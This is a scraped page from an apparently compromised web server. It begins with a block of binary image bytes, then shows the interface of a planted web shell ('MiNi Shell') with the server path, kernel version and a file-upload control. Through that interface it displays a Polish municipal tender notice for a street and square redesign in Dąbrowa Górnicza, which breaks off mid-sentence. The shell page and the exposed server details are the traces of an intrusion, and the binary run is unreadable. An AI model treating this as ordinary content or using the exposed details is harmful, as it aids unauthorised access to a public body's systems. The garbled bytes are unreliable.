JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20171220/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20171220/633509-N-2017.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 633509-N-2017 z dnia 2017-12-20 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Gmina Dąbrowa Górnicza</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">,,Wykonanie wariantowej koncepcji programowo-przestrzennej oraz dokumentacji budowlanej dla zadania ,,Przebudowa ulicy Wybickiego i placu Bema w Dąbrowie Górniczej"</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Usługi</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej - mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Gmina Dąbrowa Górnicza</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">27625531200000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">ul. Graniczna</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">21</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">41300 </span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Dąbrowa Górnicza</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">śląskie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">322 956 700</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">zamowienia_publiczne@dabrowa-gornicza.pl</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">32 2625032, 2956700</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url"> www.bip.dabrowa-gornicza.pl</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Administracja samorządowa</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny"></span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia">www.bip.dabrowa-gornicza.pl</span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">www.bip.dabrowa-gornicza.pl</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">pisemnie</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">Urząd Miejski w Dąbrowie Górniczej, ul. Graniczna 21, parter, stanowisko nr 13 - INFORMACJA</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">,,Wykonanie wariantowej koncepcji programowo-przestrzennej oraz dokumentacji budowlanej dla zadania ,,Przebudowa ulicy Wybickiego i placu Bema w Dąbrowie Górniczej"</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">ZP.WKD.271.4.84.2017</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Usługi</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Nie</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski"></span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">I. Postępowanie o udzielenie zamówienia prowadzone w trybie przetargunieograniczonego na podstawie ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych ( t.j.Dz.U. z 2017r., poz. 1579) zwanej dalej ustawą Pzp, o wartości zamówienia poniżej 209.000,00 EUR.II. Przedmiot zamówienia obejmuje: : 1. Sporządzenie minimum 3 wariantów koncepcji programowo- przestrzennej wraz z wizualizacją oraz dokumentacją budowlaną dla przebudowy ulicy Wybickiego iplacu Bema w Dąbrowie Górniczej. 1) Planowany obszar realizacji zamówienia zawiera się wgranicach nieruchomości gruntowych nr 1/3, 10/2, 12/6, 12/8, 35/2, 38, 42, 43, 44, 45, 67, 69/2 K.M.65 oraz nr 22, 34/4, 55, 56, 57, 58, 59, 60 K.M. 64, obręb 0003 Dąbrowa Górnicza. 2) Mapęzawierającą graficznie wskazany planowany obszar opracowania stanowi załącznik nr 1 do projektuumowy oraz jednocześnie załącznik nr 8 do SIWZ. 2. Wykonanie koncepcji programowo -przestrzennych, o której mowa w pkt. 1 dotyczy zagospodarowania terenu, branży drogowej,oświetlenia ulicznego, zieleni i małej architektury i organizacji ruchu oraz obejmuje: 2.1. Opis stanuistniejącego układu drogowego oraz terenów przyległych. 2.2. Wykonanie dobowego pomiarunatężenia ruchu drogowego na skrzyżowaniu ulicy Wybickiego, Tierieszkowej i Bema, w dniuroboczym (od wtorku do czwartku) z rozróżnieniem ilościowej, kierunkowej oraz rodzajowejstruktury ruchu. 2.3. Analiza wyników pomiarów natężenia ruchu drogowego oraz opracowaniewniosków. 2.4. Opracowanie wariantowej koncepcji zmian w geometrii skrzyżowania zuwzględnieniem organizacji ruchu. 2.5. Identyfikacja potrzeb użytkowników przestrzeni publicznej wzakresie infrastruktury drogowej oraz placu Bema. 2.6. Skoordynowanie opracowania z innymiopracowaniami projektowymi dotyczącymi terenu przedmiotowej inwestycji oraz terenówprzyległych. 2.7. Uwzględnienie warunków i opinii uzyskanych w ramach korespondencjiprowadzonej z poszczególnymi Wydziałami Urzędu Miejskiego w Dąbrowie Górniczej, wszczególności: 1) Uwzględnienie zapisów miejscowego planu zagospodarowania przestrzennego; 2)Wyznaczenie stanowisk postojowych wzdłuż ulicy Wybickiego; 3) Zaplanowanie zatokprzystankowych dla komunikacji miejskiej w rejonie skrzyżowania z ulicą Kwiatkowskiego; 4)Zaplanowanie wydzielonej z jezdni drogi rowerowej lub ciągu pieszo-rowerowego wzdłuż ulicyWybickiego; 5) Uwzględnienie wykonania toalety publicznej samoobsługowej z podłączeniem domediów oraz plenerowej wypożyczalni rowerów. 6) Zaplanowanie na terenie placu Bema przestrzeniatrakcyjnej dla mieszkańca, zachęcającej do korzystania z placu, także z wykorzystaniem elementówmałej architektury. 8. Sporządzone warianty koncepcji powinny uwzględniać różne sposoby:zagospodarowania pasa drogowego oraz rozmieszczenia poszczególnych jego elementów; rozwiązańinżynieryjnych w zakresie skrzyżowania ulicy Wybickiego z ulicą Bema i Tierieszkowej, a takżesposoby zagospodarowania terenu placu Bema. 9. Zamawiający zastrzega sobie możliwość wyboruposzczególnych elementów z zaproponowanych koncepcji, które będą podstawą do sporządzeniadokumentacji budowlanej. 10. Opracowanie szacunkowych kosztów realizacji poszczególnychelementów sporządzonych wariantów koncepcji. 11. Przeprowadzenie konsultacji społecznych zudziałem mieszkańców miasta Dąbrowa Górnicza. 1) Konsultacje powinny być przeprowadzonezgodnie z zapisami regulaminu określonego w Uchwale nr XXXIX/814/14 Rady Miejskiej wDąbrowie Górniczej. z dnia 3 września 2014 r. w sprawie zasad i trybu przeprowadzania konsultacji zmieszkańcami miasta Dąbrowa Górnicza. Regulamin znajduje się pod adresem:http://konsultacje.dabrowa-gornicza.pl/regulamin 2) W ramach konsultacji Wykonawca zobowiązujesię do zorganizowania co najmniej dwóch spotkań z mieszkańcami, z czego co najmniej jedno, naktórym zostaną zebrane propozycje mieszkańców oraz co najmniej jedno na którym Wykonawcazaprezentuje mieszkańcom miasta przygotowane rozwiązania koncepcyjne. 3. Wykonaniedokumentacji budowlanej, o której mowa w ust. 1 polega na wykonaniu projektu budowlanego iprojektów wykonawczych zawierających następujące szczegółowe elementy: 3.1. Część opisowoobliczeniowa: Opis techniczny zawierający między innymi: 1) opis obiektu (w tym: opis stanuistniejącego i projektowanego, analiza powiązania z innymi drogami publicznymi oraz określeniezmian w dotychczasowej infrastrukturze zagospodarowania terenu), 2) parametry techniczne, 3)Sporządzenie analizy odwodnienia nawierzchni, 4) Uzgodnienie warunków technicznych dlaewentualnej przebudowy infrastruktury, np. sieci wod-kan, sieci energetycznych, teletechnicznych itp.,5) opis przyjętej technologii robót, 6) opis wszystkich ewentualnych kolizji, 7) wykaz działekobejmujących zakres inwestycji określony liniami rozgraniczenia, 8) wykaz działek położonych pozaliniami rozgraniczenia inwestycji w zakresie obszaru niezbędnego do przebudowy infrastruktury, 9)określenie warunków gruntowo-wodnych i grupy nośności podłoża, 10) informację BIOZ, 11)wszystkie obliczenia (dla robót: przygotowawczych, rozbiórkowych, ziemnych, podbudowy,nawierzchni itp.) 3.2. Uzgodnienia: 1) protokół z narady koordynacyjnej uzyskany na podstawie art.7d pkt. 2 oraz 28b ustawy z dnia 17 maja 1989r.- Prawo geodezyjne i kartograficzne ( Dz. U. z 2015 r.,poz. 520 ze zm. ) i wymagane w nim dodatkowe uzgodnienia branżowe, 2) zatwierdzony projektdocelowej organizacji ruchu, 3) projekty dla wszystkich branż infrastruktury technicznej musząposiadać, odpowiednio, pozytywne uzgodnienie z jednostkami zarządzającymi tą infrastrukturą, orazwszystkie niezbędne uzgodnienia wynikające z przepisów odrębnych (np. RDOŚ) 3.3. Częśćkosztowa: 1) przedmiary robót (w formacie *.xls) w postaci tabelarycznego zestawienia rodzaju robótwraz ze szczegółowym wyliczeniem ich ilości. 2) kosztorysy inwestorskie 3.4. Część rysunkowa: 1)rysunek planu orientacyjnego, 2) rysunek planu sytuacyjnego w skali 1:500 z zaznaczonymiprojektowanymi rozwiązaniami, 3) rysunek planu sytuacyjnego w skali 1:500 z zaznaczonymiprojektowanymi rozwiązaniami - plansza zbiorcza wszystkich branż, 4) rysunki profili podłużnych, 5)rysunki przekrojów poprzecznych, konstrukcyjnych i charakterystycznych, 6) szczegółowe rysunkiprojektowanych rozwiązań konstrukcyjnych, 7) projekt nowych nasadzeń drzew i krzewów wraz zinwentaryzacją zieleni do usunięcia (wg potrzeb), 8) projekt docelowej organizacji ruchu. 3.5. Mapydo celów projektowych: Dokumentacje winny być wykonane na aktualnych podkładach geodezyjnychw skali 1:500. Do sporządzenia podkładów geodezyjnych zobowiązany jest Wykonawca. 3.6. Podziałygeodezyjne działek: W przypadku konieczności wykonania podziałów geodezyjnych wynikających zprojektu, podziały geodezyjne zostaną zlecone i wykonane na koszt Wykonawcy. 3.7. Badaniageologiczne: Warunki gruntowo - wodne Wykonawca zobowiązany jest określić na podstawie badańpoziomu wód gruntowych, rodzaju zalegającego poniżej projektowanych wykopów gruntu oraz jegowskaźnika piaskowego. 4. Dokumentacja projektowa dla zamówienia musi zawierać następująceszczegółowe elementy: 4.1. Projekt budowlany i projekty wykonawcze winny być sporządzonezgodnie z rozporządzeniem Ministra Infrastruktury z dnia 02 września 2004r w sprawieszczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania iodbioru robót budowlanych oraz programu funkcjonalno - użytkowego (Dz. U. z 2013 r., poz. 1129) -zawierająca przede wszystkim elementy wskazane w pkt. 3 niniejszej SIWZ. 4.2. SpecyfikacjeTechniczne Wykonania i Odbioru Robót Budowlanych (STWiORB), przez którą należy rozumiećopracowanie zawierające w szczególności zbiory wymagań niezbędnych do określenia standardu ijakości wykonania robót, w zakresie sposobu wykonania robót budowlanych, właściwości wyrobówbudowlanych oraz oceny prawidłowości wykonania poszczególnych robót. 4.3. Kosztorys inwestorskisporządzony na podstawie w/w STWiORB, zgodnie z rozporządzeniem Ministra Infrastruktury z dnia18 maja 2004r w sprawie określania metod i podstaw sporządzania kosztorysu inwestorskiego,obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanychokreślonych w programie funkcjonalno - użytkowym (Dz. U. z 2004 r., Nr 130, poz. 1389). 4.4.Infrastrukturę rowerową należy zaprojektować uwzględniając wytyczne i wskazania zawarte wopracowaniu pn. ,,Metropolia Silesia na rowerach", wydanym przez Górnośląski ZwiązekMetropolitarny w 2015 roku i dostępnym w formacie pdf pod adresem: https://www.katowice.eu/rowerem/PublishingImages/rowerem/dokumenty-strategiczne/Metropolia%20Silesia%20na%20rowerach.pdf 5. Ponadto w ramach zamówienia Wykonawca będziezobowiązany do: 5.1. konsultowania z wyznaczonym przedstawicielem Zamawiającego wszystkichistotnych rozwiązań projektowych oraz uczestniczenia w organizowanych przez Zamawiającegokonsultacjach społecznych; Wykonawca zobowiązany jest na żądanie Zamawiającego dostarczyćopracowane materiały w wersji papierowej i elektronicznej, 5.2. sporządzenia map do celówprojektowych zgodnie z obowiązującymi przepisami w tym zakresie, a także wykonania pomiarówsytuacyjno - wysokościowych, 5.3. poniesienia kosztów związanych z uzyskaniem uzgodnieńbranżowych, protokołu z narady koordynacyjnej oraz badań podłoża gruntowego (wg potrzeb), 5.4.wykonania projektów likwidacji ewentualnych kolizji wynikłych na etapie uzgodnień branżowych(zakres usunięć ewentualnych kolizji należy przedstawić na roboczo do akceptacji w siedzibieZamawiającego), 5.5. wykonania na własny koszt ekspertyz, opinii, badań i innych dokumentów, któresą niezbędne do prac projektowych oraz do uzyskania decyzji pozwolenia na budowę/ lub zgłoszeniazamiaru wykonania robót budowlanych dla realizacji przedmiotu zamówienia, 5.6. uzyskaniaakceptacji Zamawiającego planu sytuacyjnego i przyjętych rozwiązań konstrukcyjnych, 5.7. uzyskaniana rzecz Zamawiającego decyzji pozwolenia na budowę lub innych decyzji przewidzianychprzepisami prawa niezbędnych dla realizacji robót budowlanych, w tym także zezwalających nawycinkę drzew lub usunięcie zieleń,. 5.8. pełnienia nadzorów autorskich na zasadach określonych w §5 projektu umowy. 5.9. Przed opracowaniem kosztorysów, przedmiarów robót i STWiORBWykonawca zobowiązany jest do pisemnego uzgodnienia z Zamawiającym poziomu zagregowaniarobót objętych projektem. 6. Oświadczenia. Do dokumentacji technicznej Wykonawca załączyoświadczenie, że dokumentacja ta jest wykonana zgodnie z umową, obowiązującymi przepisamitechniczno-budowlanymi, normami, zasadami wiedzy technicznej, oraz że zostaje wydana w staniekompletnym z punktu widzenia celu, któremu ma służyć. Dokumentacja projektowa, specyfikacjetechniczne wykonania i odbioru robót budowlanych powinny być sporządzone zgodnie zwymaganiami Rozporządzenia Ministra Infrastruktury z dnia 02 września 2004 roku w sprawieszczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania iodbioru robót budowlanych oraz programu funkcjonalnego (Dz. U. z 2013r., poz. 1129). 7.Zastrzeżenia. Zamawiający nie dopuszcza wskazania w opracowanej dokumentacji projektowejznaków towarowych, patentów lub pochodzenia, źródła lub szczególnego procesu, którycharakteryzuje produkty lub usługi dostarczane przez konkretnego wykonawcę, jeżeli mogłoby todoprowadzić do uprzywilejowania lub wyeliminowania niektórych wykonawców lub produktów.Jedynym wyjątkiem od tej zasady jest przypadek, w którym wskazanie znaków towarowych jestuzasadnione specyfiką przedmiotu zamówienia i nie ma możliwości opisania przedmiotu zamówieniaza pomocą dostatecznie dokładnych określeń, a wykonawca uzyskał uprzednio pisemną zgodęZamawiającego na takie wskazanie. W przypadku wyrażenia zgody przez 